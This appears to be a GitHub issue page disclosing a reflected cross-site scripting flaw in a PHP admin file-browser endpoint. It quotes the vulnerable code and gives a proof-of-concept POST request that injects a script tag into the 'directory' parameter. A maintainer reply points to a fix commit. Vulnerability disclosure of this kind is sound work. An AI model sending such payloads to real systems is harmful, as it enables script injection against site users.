Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
FILE: core/admin/ajax/developer/extensions/file-browser.php
Vul Code: $parts = explode("/",$_POST["directory"]); -> $postdirectory[] = $part; -> $directory = SERVER_ROOT.$postdirectory; ->
PoC: POST /core/admin/ajax/developer/extensions/file-browser.php xxx: xxx xxx: xxx xxx: xxx
cloud_disabled=1&location=server&directory=<script>alert(123)</script>
The text was updated successfully, but these errors were encountered:
Stopping XSS.
b34bd9a
#327
Thanks for the report, should be fixed in 4.2-devel!
Sorry, something went wrong.
No branches or pull requests
FILE:
core/admin/ajax/developer/extensions/file-browser.php
Vul Code:
$parts = explode("/",$_POST["directory"]); ->
$postdirectory[] = $part; ->
$directory = SERVER_ROOT.$postdirectory; ->
PoC:
POST /core/admin/ajax/developer/extensions/file-browser.php
xxx: xxx
xxx: xxx
xxx: xxx
cloud_disabled=1&location=server&directory=<script>alert(123)</script>
The text was updated successfully, but these errors were encountered: